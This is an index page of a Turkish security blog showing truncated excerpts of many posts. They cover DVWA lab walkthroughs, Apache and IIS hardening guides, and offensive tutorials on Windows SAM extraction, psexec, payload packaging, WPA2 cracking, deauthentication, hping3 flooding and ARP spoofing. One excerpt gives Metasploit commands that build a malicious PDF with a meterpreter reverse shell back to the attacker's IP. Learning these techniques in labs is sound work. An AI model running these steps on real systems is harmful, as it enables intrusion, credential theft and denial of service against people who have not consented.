|
|
|
|
2025 yılı sonuçları :
|
| |
|
|
|
|
| Merhaba, önceki yazımda bahsettiğim dvwa uygulamasında high level güvenlik seviyesini atlatma ve brute force saldırısı yapma yönteminin son sürüm burpsuite yazılımlarında hatalı çalıştığını fark etmem sonucunda modern burpsuite yazılımlarında nasıl aynı işlemin tekrarlanabileceğini göstermek için bu yazıyı kaleme almaktayım. Bu yazıda dvwa web uygulaması high güvenlik seviyesindeyken brute force yaparak nasıl uygulama kullanıcısı parolasının çalınabileceği gösterilecektir.
Konuya giriş ... [Devamı] |
| Bu yazı 23.03.2025 tarihinde, saat 03:18:06'de yazılmıştır. |
|
| |
|
|
|
|
| Merhaba, bu yazıda dvwa web uygulamasında güvenlik medium seviyeye çıkarıldığında ne önlem alındığı ve nasıl bu güvenliğin atlatılabileceği gösterilecektir.
Konuya giriş yapmadan önce bu yazının dahil olduğu dvwa eğitim serisindeki tüm makalelere şu adresten
DVWA Tüm Dersler
bu yazının ilintili olduğu dvwa eğitim serisindeki diğer makalelere ise şu adreslerden
DVWA Cross Site Request Forgery (Low Level)
DVWA Cross Site Request Forgery (Medium Leve... [Devamı] |
| Bu yazı 24.03.2025 tarihinde, saat 01:25:30'de yazılmıştır. |
|
| |
|
|
|
|
| Merhaba, bu yazıda dvwa web uygulamasında csrf için güvenlik high seviyeye çıkarıldığında ne önlem alındığı ve nasıl bu güvenliğin atlatılabileceği gösterilecektir.
Konuya giriş yapmadan önce bu yazının dahil olduğu dvwa eğitim serisindeki tüm makalelere şu adresten
DVWA Tüm Dersler
bu yazının ilintili olduğu dvwa eğitim serisindeki diğer makalelere ise şu adreslerden
DVWA Cross Site Request Forgery (Low Level)
DVWA Cross Site Request Forgery (Med... [Devamı] |
| Bu yazı 24.03.2025 tarihinde, saat 02:38:17'de yazılmıştır. |
|
| |
|
|
|
|
| Merhaba, bu yazıda dvwa web uygulamasında sql injection için güvenlik high seviyeye çıkarıldığında ne önlem alındığı ve nasıl bu güvenliğin atlatılabileceği gösterilecektir.
Konuya giriş yapmadan önce bu yazının dahil olduğu dvwa eğitim serisindeki tüm makalelere şu adresten
DVWA Tüm Dersler
bu yazının ilintili olduğu dvwa eğitim serisindeki diğer makalelere ise şu adreslerden
DVWA SQL Injection (Low Level)
DVWA SQL Injection (Low Level) II
DVW... [Devamı] |
| Bu yazı 25.03.2025 tarihinde, saat 06:54:23'de yazılmıştır. |
|
| |
|
|
|
|
| Merhaba, bu yazıda dvwa web uygulamasında blind sql injection için güvenlik high seviyeye çıkarıldığında ne önlem alındığı ve nasıl bu güvenliğin atlatılabileceği gösterilecektir.
Konuya giriş yapmadan önce bu yazının dahil olduğu dvwa eğitim serisindeki tüm makalelere şu adresten
DVWA Tüm Dersler
bu yazının ilintili olduğu dvwa eğitim serisindeki diğer makalelere ise şu adreslerden
DVWA Blind SQL Injection (Low Level)
DVWA Blind SQL Injection (Me... [Devamı] |
| Bu yazı 25.03.2025 tarihinde, saat 08:39:06'de yazılmıştır. |
|
| |
|
|
|
|
| Bu yazıda güvenlik düzeyi High seviyesine yükseltilmiş DVWA'da Stored XSS'e karşı ne gibi bir güvenlik önlemi alındığı incelenecektir ve alınan güvenlik önlemine rağmen yine Stored XSS saldırısı düzenlenebilir mi sorusuna yanıt aranacaktır.
Konuya giriş yapmadan önce bu yazının dahil olduğu dvwa eğitim serisindeki tüm makalelere şu adresten
DVWA Tüm Dersler
bu yazının ilintili olduğu dvwa eğitim serisindeki diğer makalelere ise şu adreslerden
DVWA St... [Devamı] |
| Bu yazı 26.03.2025 tarihinde, saat 04:18:07'de yazılmıştır. |
|
| |
|
|
|
|
| Merhaba, bu yazıda dvwa web uygulamasında var olan güvenlik seviyesi takılı kalma problemi için sorunun nasıl çözümlenebileceği açıklanacaktır.
Konuya giriş yapmadan önce bu yazının dahil olduğu dvwa eğitim serisindeki tüm makalelere şu adresten
DVWA Tüm Dersler
erişebilirsiniz.
Problem
DVWA'nın bu eğitim serisinde kullanılan 1.9 sürümünde bazı ders sayfalarında güvenlik seviyesi takılı kalabiliyor. Örneğin güvenlik seviyesini ayarlama sayfasında güvenl... [Devamı] |
| Bu yazı 15.04.2025 tarihinde, saat 00:46:58'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Birebir denenmiştir ve başarıyla uygulanmıştır.
Gereksinimler
Apache Remote Buffer Overflow and Local Privilege Escalation VM (Ubuntu 20.04 LTS)
// Saldırgan VM
Kioptrix - Level 1
// Hedef VM
Hazırlık
“Apache Mod_SSL Remote Buffer Overflow” zafiyeti
Apache yazılımı ve
Apache’nin mod_ssl modülünde
yer alan güvenlik açıklığı yoluyla apache web sunuculara uzaktan buffer ov... [Devamı] |
| Bu yazı 06.05.2025 tarihinde, saat 05:03:45'de yazılmıştır. |
|
| |
|
|
|
|
| Burp ile yapılan Brute Force ve Dictionary saldırılarında ekranda akan denemeler sırasında iki metot söz konusudur. Bunlardan birincisi yanlış denemelerde gelen bir cümleyi referans alma, ikincisi ise doğru denemede gelen (gelecek) bir cümleyi referans almadır.
Web uygulama login sayfalarında yanlış hesap bilgisi girildiğinde bir hata / uyarı cümlesi gelir. Doğru hesap bilgisi girildiğinde ise belki bir hoşgeldiniz cümlesi gelir. Dolayısıyla olası hesapları denerken denemelerimiz içeri... [Devamı] |
| Bu yazı 06.05.2025 tarihinde, saat 07:43:16'de yazılmıştır. |
|
| |
|
|
|
|
| Çoğu web tarayıcı HTML formlarına girilen kullanıcı hesaplarını hatırlatma konusunda bir mekanizmaya sahiptirler. Bu mekanizma enable edildiğinde kullanıcı hesapları kullanıcının makinesine depolanır. Depolanan kullanıcı hesapları bir sonraki ziyarette ise tarayıcı tarafından aynı uygulamaya çekilir.
Kullanıcı makinesinde depolanan otomatik tamamlama verileri kullanıcının makinesine “kullanıcı seviyesinde kod çalıştırma haklarıyla sızarak” ya da “fiziksel anlamda makineye erişerek” eld... [Devamı] |
| Bu yazı 06.05.2025 tarihinde, saat 12:32:09'de yazılmıştır. |
|
| |
|
|
|
|
| XSS zafiyetleri üçe ayrılırlar. Bunlar Stored Xss, Reflected Xss ve Dom Xss' tirler. Stored Xss girilen input'un filtrelenmeden hedef web uygulamasının veritabanına kaydolduğu ve oradan çekilerek web uygulaması içerisinde kullanıldığı durumda ortaya çıkar. Reflected Xss girilen input'un filtrelenmeden olduğu gibi web uygulamasının bir noktasına yansıtıldığı durumda ortaya çıkar. Dom Xss ise yine girilen input'un filtrelenmeden olduğu gibi web uygulamasının bir noktasına yansıtıldığı durumda orta... [Devamı] |
| Bu yazı 07.05.2025 tarihinde, saat 07:22:20'de yazılmıştır. |
|
| |
|
|
|
|
| Bir web sunucuda http trace metodu açıldığında http talep ve http yanıtlarının log’lanması işlemi etkinleşir.
(ENG)
Metasploit Tip: Enable HTTP request and response logging with set HttpTrace true
(TUR)
Measploit İpucu: HttpTrace’i true yapma ile http talep ve yanıt log’lama aktifleşir.
Referans: Metasploit Framework msfconsole arayüzünde gelen rastgele ipuçları
Http trace ile bir web sunucuya talep gönderildiğinde gönderilen htt... [Devamı] |
| Bu yazı 11.05.2025 tarihinde, saat 23:16:50'de yazılmıştır. |
|
| |
|
|
|
|
| Normalde <a> tag'ı target="_blank" ile kullanıldığında bir başka sayfaya sıçrarırız. Fakat target="_blank" ile sıçradığımız sayfalar parent sayfanın window.open nesnesini düzenleyebilme yetkisine sahip olduklarından sıçradığımz sayfa javascript kodlaması ile window.open nesnesini manipule edebilir ve parent sayfayı başka bir sayfaya yönlendirebilir. Böylece kurban parent sayfaya döndüğünde belki de orijinal sayfanın birebir kopyası bir başka sayfayı görüntüleyeceğinden kullanıcı adı, şifre gi... [Devamı] |
| Bu yazı 13.05.2025 tarihinde, saat 11:53:00'de yazılmıştır. |
|
| |
|
|
|
|
|
Referer Header
a. Referer Header Nedir?
Referer başlığı bir http request başlığıdır. Referer header'ı bir web sitesindeki linkten bir başka sayfaya atladığımızda atladığımız sayfaya nereden geldiğimizi gösteren link değerini alır. Böylece web site sahipleri uygulamalarına trafiğin nereden geldiğini gözlemleyebilirler. Bir örnek vermek gerekirse scotthelme.co.uk web sitesi sahibi kendisine gelen trafikten 4000 kullanıcının twitter'dan geldiğini gözlemlemiş. Aşağıda bu site sah... [Devamı] |
| Bu yazı 15.05.2025 tarihinde, saat 11:32:28'de yazılmıştır. |
|
| |
|
|
|
|
| Second Order Sql Injection kullanıcıdan gelen kötü amaçlı kodun ilk yerleştiği sorguda zafiyet teşkil etmediği ancak daha sonra kullanıldığı sorgularda zafiyet teşkil ettiği durumlara denir. Daha detaylı ifade edecek olursak second order sql injection sql kodlarının sisteme gönderilmesi sonrası ilk sorguyu geçip veritabanına olduğu gibi kaydedilmesi, ardından kaydedilen verinin uygulamaya ait bir başka sayfa tarafından çağırılması sonucu ortaya çıkan zafiyete denir.
Second Order Sql Inj... [Devamı] |
| Bu yazı 15.05.2025 tarihinde, saat 17:33:13'de yazılmıştır. |
|
| |
|
|
|
|
|
İçindekiler
X-Frame-Options Başlığı
a. Frame Nedir?
b. Clickjacking Nedir?
c. Clickjacking Saldırı Türleri
d. X-Frame-Options Nasıl Korur?
e. X-Frame-Options Nasıl Aktif Edilir?
f. Clickjacking Sonuç
g. EK: Missing X-Frame-Options Zafiyeti ve Insecure External Frame Usage Zafiyeti Arasındaki Fark
Uygulama 1 [Clickjacking Uygulaması]
Uygulama 2 [Clickjacking Uygulaması (Facebook Like & Share Butonları)]
Uygulama 3 [X-Frame-Options ile Önlem Uygulamas... [Devamı] |
| Bu yazı 15.05.2025 tarihinde, saat 21:47:34'de yazılmıştır. |
|
| |
|
|
|
|
| a. X-XSS-Protection Nedir
X-XSS-Protection yanıt başlığı eski web tarayıcılarda XSS saldırılarını önleyen bir http güvenlik başlığıdır. Web tarayıcılarının görüntülediği web uygulamalarda xss payload’u gelirse bu xss payload’unun web tarayıcıda çalışmasını önler ve son kullanıcının güven içinde web uygulamada gezinmesini sağlar. Günümüzde daha kapsamlı olan Content-Security-Policy’ye yerini bırakmıştır. Fakat eski işletim sistemleri kullanan ve dolayısıyla eski web tarayıcılar kullanan ... [Devamı] |
| Bu yazı 16.05.2025 tarihinde, saat 03:04:24'de yazılmıştır. |
|
| |
|
|
|
|
| Bu zafiyet jQuery kütüphanesinin güncel versiyonunun web uygulamasında kullanılmamasını ifade etmektedir. Bu yazı ise çoğu web geliştiricisinin jQuery kütüphanesinin en güncel versiyonunu kullandığını zannederken aslında nasıl eski versiyonunu kullandığını gösterecektir.
jQuery'nin resmi sitesinin yayınladığı jquery stabil versiyonları şu şekildedir:
jQuery 1.x
jQuery 2.x
jQuery 3.x
Bu kütüphaneler indirilip web uygulamasına eklenebileceği gibi CDN linkleri ile de... [Devamı] |
| Bu yazı 16.05.2025 tarihinde, saat 05:21:26'de yazılmıştır. |
|
| |
|
|
|
|
| Web tarayıcılar web sunuculardan gelen yanıt paketlerini okurlarken yanıt paketlerindeki Content-Type başlığına bakarlar ve ona göre paket içeriğini okuma / yorumlama ve ekrana sunma uygularlar. Fakat yanıt paketlerinde Content-Type başlığı bozuk değerde olursa veya Content-Type başlığı hiç yer almazsa yanıt paketinin doğru okunabilmesi / yorumlanabilmesi ve ekrana sunulabilmesi amacıyla eski web tarayıcı yazılımları (özellikle Internet Explorer) yanıt paketleri içerisindeki içerik üzerinde Cont... [Devamı] |
| Bu yazı 16.05.2025 tarihinde, saat 19:09:33'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Bu uygulama birebir denenmiştir ve başarıyla uygulanmıştır.
Gereksinimler
Ubuntu 18.04 LTS - Nmap SSL-ENUM-CIPHER Script’i
// Host Makine
Kali 2019.3 VM - Apache
// Guest Makine - Örnek Bir// Apache Web Sunucu
a. Apache’de HTTPS Açma
Apache web sunucularda yapılandırmaya giderek ssl/tls özelliği açılabilir. Bu işlemler önce ssl/tls veri iletimi için public ve private anahtar oluşturma, sonra ssl/tls özelliğinin apache konfig... [Devamı] |
| Bu yazı 17.05.2025 tarihinde, saat 01:12:50'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Bu yazı birebir denenmiştir ve başarıyla uygulanmıştır.
Directory Listing demek hedef web uygulamasını dizin ve hiyerarşileriyle beraber dosyalarını görüntüleme demektir. Bu dizin listeleme işlevi hedef web uygulamasında paylaşılmayan ama sunucuda olan hassas dosyaların görünmesine ve okunmasına olanak sağlar. Dolayısıyla kapatılması önerilmektedir.
Apache sunucularda Directory Listing kapatmanın yolu apache2.conf dosyasını yapılandırmaktan geçer. Öncelikle localhost'um... [Devamı] |
| Bu yazı 17.05.2025 tarihinde, saat 05:37:01'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Bu yazı birebir denenmiştir ve başarıyla uygulanmıştır.
Belli başlı http güvenlik başlıkları vardır. Bunlar arasında
X-XSS-Protection
// Eski tarayıcılar için XSS
// önleyici header
X-Content-Type-Options
// Sunucudan gelen dosyayı
// belirtilen uzantıyla
// çalıştırma kısıtı
Set-cookie (HttpOnly, Secure, SameSite)
// Ortaya çıkabilecek olası
// zafiyetlere karşı (örn;
// xss'e karşı) çerez güvenliğini
// sağlar ve çerezin üçüncü parti... [Devamı] |
| Bu yazı 17.05.2025 tarihinde, saat 21:56:17'de yazılmıştır. |
|
| |
|
|
|
|
| Http Options methodu sunucuda izinli http methodları bilgisinin http yanıtlarıyla kullanıcılara gitmesini sağlayan bir http methodudur. Eğer bir sunucuda http options methodu açık olursa web geliştiricisi dalgınlıkla PUT ya da DELETE gibi http methodlarını sunucuda açık bıraktığında saldırganın bundan haberi olacaktır. Saldırgan bu bilgiden yola çıkarak hedef web sunucusuna dosya yükleyebileceğini ya da hedef web sunucusundan dosya silebileceğini anlayacaktır ve saldırısını gerçekleştirecektir.
... [Devamı] |
| Bu yazı 17.05.2025 tarihinde, saat 22:47:14'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Birebir denenmiştir ve başarıyla uygulanmıştır.
Apache'de varsayılan olarak Trace methodu kapalı gelir. Bunu aşağıda görebilmekteyiz:
telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
TRACE / HTTP/1.0
HTTP/1.1 405 Method Not Allowed
Date: Tue, 17 Oct 2017 07:47:31 GMT
Server: Apache/2.4.7 (Ubuntu)
Allow:
Content-Length: 297
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML ... [Devamı] |
| Bu yazı 18.05.2025 tarihinde, saat 02:25:04'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Denendi ve başarıyla uygulandı.
Apache yazılımı kullanan bir web sitesinin olmayan bir dizinine bağlanmaya çalıştığımızda normal koşullarda 404 Not Found hatası alırız. Ancak bazen bu hatanın yanında bir de web sunucuda çalışan web server yazılımının bilgisini, hatta web sunucuda çalışan işletim sisteminin bilgisini alabiliriz. Veyahut siteye bağlandığımızda karşılığında aldığımız HTTP Response paketinin header'ında da aynı bilgileri alabiliriz. Peki bunları nasıl engelleyebilir... [Devamı] |
| Bu yazı 18.05.2025 tarihinde, saat 02:27:00'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Birebir denenmiştir ve başarıyla uygulanmıştır.
Apache sunucularda SSLv2 ve SSLv3'yi disable edip daha güvenli olan TLS protokolünü enable etmek için
sudo a2enmod ssl // SSL modülü yüklenir.
nano /etc/apache2/apache2.conf
satırları konsola girilir ve aşağıdaki satır apache2.conf dosyasının en altına eklenir.
SSLProtocol -all +TLSv1.2
-all ile tüm şifreleme protokolleri disable olur. + ile de belirtilen şifreleme pr... [Devamı] |
| Bu yazı 18.05.2025 tarihinde, saat 05:27:27'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Bu uygulama birebir denenmiştir ve başarıyla uygulanmıştır.
Gereksinimler
Ubuntu 18.04 LTS - Nmap SSL-ENUM-CIPHER Script’i
// Host Makine
Windows Server 2012 R2 VM
// Guest Makine - Örnek// Windows IIS// Sunucu
a. IIS’de HTTPS Açma
Windows Server makinelerde IIS Yöneticisi’nden hizmet olarak sunulan web siteye erişimin https üzerinden olabilmesi özelliği açılabilir. Bu işlemler IIS Yöneticisi’nden uygulanır. Adımlar şu şekildedir... [Devamı] |
| Bu yazı 20.05.2025 tarihinde, saat 11:29:25'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Bu yazı birebir denenmiştir ve başarıyla uygulanmıştır.
Gereksinimler
Windows Server 2008 R2 Sanal Makinası
Belli başlı http güvenlik başlıkları vardır. Bunlar arasında
X-XSS-Protection
// Eski tarayıcılar için XSS
// önleyici header
X-Content-Type-Options
// Sunucudan gelen dosyayı
// belirtilen uzantıyla
// çalıştırma kısıtı
Set-cookie (HttpOnly, Secure, SameSite)
// Ortaya çıkabilecek olası
// zafiyetlere karşı (örn... [Devamı] |
| Bu yazı 21.05.2025 tarihinde, saat 18:27:24'de yazılmıştır. |
|
| |
|
|
|
|
|
İçindekiler
IIS Fingerprinting Engelleme (Windows Server 2008 R2 Örneği)
IIS Fingerprinting Engelleme (Windows Server 2012 R2 Örneği)
IIS Fingerprinting Engelleme (Windows Server 2008 R2 Örneği) - Ekstra
IIS Fingerprinting Engelleme (Windows Server 2008 R2 Örneği)
(+) Bu başlık birebir denenmiştir ve başarıyla uygulanmıştır.
IIS çalışan web sunucuları http yanıt paketlerinde bilgi ifşasında bulunabilmekteler. Bu bilgi ifşalarını durdurabilm... [Devamı] |
| Bu yazı 22.05.2025 tarihinde, saat 21:53:20'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Birebir Windows Server 2008 R2 ve 2012 R2’de denenmiştir ve başarılı olunmuştur.
IIS sunucularda http metotlarını kapamak için IIS Manager arayüzü kullanılabilir. Bu işlem IIS Request Filtering ekranındaki Http Verbs sekmesinde Edit Features ayar penceresinde yer alan AllowUnlistedVerbs tick kutucuğunun tick’li olup olmamasına göre iki farklı şekilde yapılabilir. Şöyle ki:
i) Request Filtering -> Http Verbs sayfasında yer alan Edit Features penceresinde AllowUnlistedVe... [Devamı] |
| Bu yazı 23.05.2025 tarihinde, saat 02:24:30'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Birebir web.config konfigurasyonları Win Server 2008 R2 ve 2012 R2’de denenmiştir ve başarılı olunmuştur.
IIS sunucularda http metotlarını kapamak için web.config dosyası ve konfigurasyonu kullanılabilir. Bu işlem <RequestFiltering’in alt etiketi <verbs’ün allowUnlisted attribute değeri true veya false olmasına göre iki farklı şekilde yapılabilir. Şöyle ki:
i) RequestFiltering alt etiketi <verbs etiketinin allowUnlisted attriute değeri true iken;
... [Devamı] |
| Bu yazı 23.05.2025 tarihinde, saat 02:41:32'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Birebir denenmiştir ve başarıyla uygulanmıştır.
Gereksinimler
Windows Server 2008 R2 Sanal Makinası
URLRewrite
Bu yazıda IIS sunucularda Server header'ını modifiye etme ve bu yolla saldırganlar için hedef şaşırtmanın nasıl yapılabileceği gösterilecektir. Bu işlem için IIS sunuculara UrlRewrite tool'unun yüklenmesi (URLScan kurulumu için bkz. URLscan ile IIS Fingerprinting Engelleme) ve sistemin restart'lanması gerekmektedir.
Öncelikle hedef IIS s... [Devamı] |
| Bu yazı 23.05.2025 tarihinde, saat 08:13:08'de yazılmıştır. |
|
| |
|
|
|
|
|
Uygulama I
(+) Birebir denenmiştir ve başarıyla uygulanmıştır.
Gereksinimler
Ubuntu 14.04 LTS
// Host Makina
kali-linux-1.0.4-amd64.iso
// Kali (Eski) Sanal Makinası
Bu yazıda Ubuntu ana makinasından Kali (Eski) sanal makinasına (web sunucusuna) özel tcp paketleri yollanacaktır ve böylelikle hedef web sunucusunun uptime süresi öğrenilecektir. Ardından Kali (Eski) sanal makinası (web sunucusu) yapılandırılarak uptime bilgi ifşasının ö... [Devamı] |
| Bu yazı 23.05.2025 tarihinde, saat 08:26:55'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Bu belgedeki işlemler birebir denenmiştir ve kısmen başarıyla uygulanmıştır.
Bu yazı bir başka yazı ile bağlıdır. Sıralama şu şekildedir:
Kali Linux Live'den Windows SAM Dosyasını Çekme
Kali Linux Live'den Windows SAM Dosyasını Çekme - 2
Kali Linux Live'den Windows SAM Dosyasını Manipule Etme
Ubuntu Linux'dan Windows SAM Dosyasını Çekme
Bu yazıda Windows kurulu makinayı Kali live USB diski ile başlatıp Windows'taki SAM dosyasını çekme anlatılacaktır. T... [Devamı] |
| Bu yazı 24.05.2025 tarihinde, saat 04:05:30'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Bu belgedeki işlemler birebir denenmiştir ve başarıyla uygulanmıştır.
Bu yazı bir başka yazı ile bağlıdır. Sıralama şu şekildedir:
Kali Linux Live'den Windows SAM Dosyasını Çekme
Kali Linux Live'den Windows SAM Dosyasını Çekme - 2
Kali Linux Live'den Windows SAM Dosyasını Manipule Etme
Ubuntu Linux'dan Windows SAM Dosyasını Çekme
Bu yazıda hedef sistem bir Virtual box sanal makinası olacaktır. İçinde Windows 7 yüklü olacaktır. Biz bu sanal makinaya K... [Devamı] |
| Bu yazı 24.05.2025 tarihinde, saat 04:06:30'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Bu yazı birebir denenmiştir ve başarıyla uygulanmıştır.
Bu yazı bir başka yazı ile bağlıdır. Sıralama şu şekildedir:
Kali Linux Live'den Windows SAM Dosyasını Çekme
Kali Linux Live'den Windows SAM Dosyasını Çekme - 2
Kali Linux Live'den Windows SAM Dosyasını Manipule Etme
Ubuntu Linux'dan Windows SAM Dosyasını Çekme
Gereksinimler
Windows 7 Home Premium
// Hedef Sistem
Kali Live 2016
// Hedef Sistemi Boot Edecek İşletim Sistemi... [Devamı] |
| Bu yazı 24.05.2025 tarihinde, saat 23:02:54'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Bu belgedeki işlemler birebir denenmiştir ve kısmen başarılı olunmuştur.
Bu yazı bir başka yazı ile bağlıdır. Sıralama şu şekildedir:
Kali Linux Live'den Windows SAM Dosyasını Çekme
Kali Linux Live'den Windows SAM Dosyasını Çekme - 2
Kali Linux Live'den Windows SAM Dosyasını Manipule Etme
Ubuntu Linux'dan Windows SAM Dosyasını Çekme
Bu yazıda Windows ve Ubuntu yanyana kuruluyken Ubuntu'dan Windows'taki SAM dosyasını çekme anlatılacaktır. Tüm bu süreç b... [Devamı] |
| Bu yazı 25.05.2025 tarihinde, saat 14:53:09'de yazılmıştır. |
|
| |
|
|
|
|
|
Psexec Nedir?
Psexec hafifsıklet bir telnet yerine geçen araçtır. Psexec uzak sistemde örneğin cmd.exe gibi process'ler çalıştırmaya imkan verir. Fakat psexec sadece komut satırı process'lerini uzak sistemde çalıştırabilir.
Psexec şu sistemlerde çalışır:
Client: Windows Vista ve daha yukarısı
Server: Windows Server 2008 ve daha yukarısı
Psexec Kullanımı
(+) Bu başlık birebir denenmiştir ve başarıyla uygulanmıştır.
Gereksinimler
... [Devamı] |
| Bu yazı 26.05.2025 tarihinde, saat 10:03:20'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Bu yazı başarıyla tatbik edilmiştir.
Gereksinimler
Kali 1.0.0
Windows XP (Dandik)
İş Akışı
Msfpayload aracı ile Metasploit framework'te yer alan istediğimiz payload'u exe'leştirebiliriz (paketleyebiliriz). Böylelikle bu exe dosyalarını internette boy boy sergileyerek birinin indirmesini ve çift tıklamasını bekleyebiliriz. Fakat böylesi bir senaryoda sızma işlemini gerçekleştirebilmek için saldırgan olarak bizim makinemizin dinleme m... [Devamı] |
| Bu yazı 26.05.2025 tarihinde, saat 13:18:06'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Bu belgedeki işlemler birebir denenmiştir ve başarılı olunmuştur
Kali Linux Live'den Windows SAM Dosyasını Çekme - 2 belgesinde Windows parolasının hash haliyle nasıl çekilebileceğinden ve bu hash'in nasıl kırılıp şifrenin elde edilebileceğinden bahsedilmişti. Şimdi ise windows parolasının hash halini değil de direk açık halini nasıl elde edebileceğimizden bahsedilecektir.
Öncelikle yapılacak işlemlere değinelim. İlk olarak parolası alınacak hedef sisteme bir exploit ... [Devamı] |
| Bu yazı 26.05.2025 tarihinde, saat 18:24:44'de yazılmıştır. |
|
| |
|
|
|
|
|
Gereksinimler:
Windows XP SP2 (Dandik)
Eski Kali (kali-linux-1.0.4-amd64.iso)
Adobe Reader v8.1.2
Öncelikle zararlı bir pdf oluşturalım.
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > set FILENAME zararliBelge.pdf
msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128 // Kali IP Adresi
msf exploit(adobe_utilprintf) > set LPORT 4455
ms... [Devamı] |
| Bu yazı 27.05.2025 tarihinde, saat 23:28:55'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Birebir denenmiştir ve başarılı olunmuştur.
Gereksinimler:
Utilman.exe - Windows 10 Home Premium x64 // Kurban Windows Makine
HBCD_PE_x64.iso // Hacking Aracı
Not:
Hiren's BootCD PE iso’su olan HBCD_PE_x64.iso dosyası ~/Downloads/Hiren's BootCD PE.zip dosya yolunda yedeklidir. Ayrıca resmi sitesinden en güncel hali indirilebilir:
https://www.hirensbootcd.org/download/
Senaryo:
Kurban bilgi... [Devamı] |
| Bu yazı 28.05.2025 tarihinde, saat 09:38:51'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Bu yazı gerçek sistemlerde denenmemiştir. Ancak birazdan göreceğin üzere sanal makinalarla başarılı bir şekilde simule edilebilmiştir.
Diyelim ki bir arkadaşımızın public IP'sini öğrendik. Bunun üzerine hedef Public IP'yi (yani hedef network'ün en önündeki router'ı) port taramasına tabi tuttuğumuzu ve hedef router'da telnet servisinin açık olduğunu öğrendiğimizi varsayalım. Ayrıca telnet servisine anonymous girişini test ettiğimizde
saldirgan@saldirgan-MJKL:~$ te... [Devamı] |
| Bu yazı 13.06.2025 tarihinde, saat 01:55:26'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Birebir denenmiştir ve başarılı olunmuştur.
Bu yazının ilintili olduğu makale dizisi şu şekildedir:
Aircrack-ng ile WPA2 Şifre Kırma
Aircrack-ng ile Hedefi Hattan Düşürme
Bu dökümanda USB Wifi dongle kullanılarak etraftaki router'lardan birisi hedef seçilecektir, ardından router'a giden ve gelen paketler monitör edilecektir, daha sonra hedef router'a bağlı istemcilerden birisi deauthenticate edilerek istemcinin router'a tekrar bağlantı kurmak için gönd... [Devamı] |
| Bu yazı 15.06.2025 tarihinde, saat 09:35:07'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Bu yazı birebir tatbik edilmiş olup başarıyla uygulanmıştır.
Bu yazının ilintili olduğu makale dizisi şu şekildedir:
Aircrack-ng ile WPA2 Şifre Kırma
Aircrack-ng ile Hedefi Hattan Düşürme
Bu yazıda aircrack-ng aracı ile yerel ağdaki bir cihazın interneti kesilecektir.
# Önce USB Wifi cihazını Ubuntu ekranının
# sağ üst köşesinden Disconnect'le. Sonra
# aşağıdakilerini gir.
sudo su
airmon-ng stop wlan2 // wlan2 interface'i USB Wi... [Devamı] |
| Bu yazı 16.06.2025 tarihinde, saat 06:27:59'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Bu yazı birebir denenmiştir ve başarıyla uygulanmıştır.
Dns Zone transfere imkan veren bir test ortamı vardır.
zonetransfer.me
Bu test ortamından faydalanarak dns zone transferi gerçekleştireceğiz. Öncelikle hedef web sitesinin yetkilli dns sunucu adresini öğrenelim.
dig ns zonetransfer.me
Çıktı:
v
; DiG 9.9.5-3ubuntu0.14-Ubuntu ns zonetransfer.me
;; global options: +cmd
;; Got answer:
;; ->>HEADERalert('Boo')</script>"
zon... [Devamı] |
| Bu yazı 16.06.2025 tarihinde, saat 09:42:51'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Bu yazı birebir denenmiştir ve başarılı olunmuştur.
Firewall paketlerin geçişini kontrol eden donanımdır. Paketlerin geçişine izin verip vermeme gibi kararlar alır ve her paket için verdiği kararı raporlar (log'lar). Bu yazıda firewall'ın log'larını iç ağdaki bir bilgisayara yönlendirip iç ağdaki bilgisayardan log'ların nasıl anlık olarak izlenebileceği gösterilecektir.
Firewall paketlerin geçişine izin verilip verilmeyeceğini (DROP ve ALLOW ile) tayin eden bir yazılımd... [Devamı] |
| Bu yazı 16.06.2025 tarihinde, saat 16:20:18'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Bu yazıdaki testler birebir uygulanmıştır ve başarılı olunmuştur.
Not:
Bu yazıda hping3'in yamalı versiyonu kullanılmıştır.
Hping3 normalde paket oluşturma aracıdır. Ancak hping3 tool'unu --flood parametresi ile kullanırsak oluşturduğumuz paketleri olabildiğince hızlı gönder demiş oluruz ve böylece dos saldırısı yapmış oluruz. Şimdi çeşitli paketlerle dos saldırıları düzenleyelim.
a. Hping3 ile UDP Flood Yapma
Laptop'tan desktop PC'ye u... [Devamı] |
| Bu yazı 17.06.2025 tarihinde, saat 16:22:30'de yazılmıştır. |
|
| |
|
|
|
|
|
(+) Bu yazı birebir denenmiştir ve başarıyla uygulanmıştır.
Yerel ağdaki tüm cihazlara gateway'in MAC adresi hatalı olarak bildirilirse tüm cihazlar gateway'e paket gönderiyorum derken başka bir yere paket göndereceğinden internet erişimleri kopartılmış olacaktır. Ancak bu sıkıntı sonrası cihazlar arp broadcast yaparak gateway'i tekrar bulacaklardır ve internet bağlantılarını onaracaklardır. Bu nedenle yerel ağdaki cihazlara gönderilecek arp paketleri bir kez değil, sürekli gönderil... [Devamı] |
| Bu yazı 20.06.2025 tarihinde, saat 16:42:52'de yazılmıştır. |
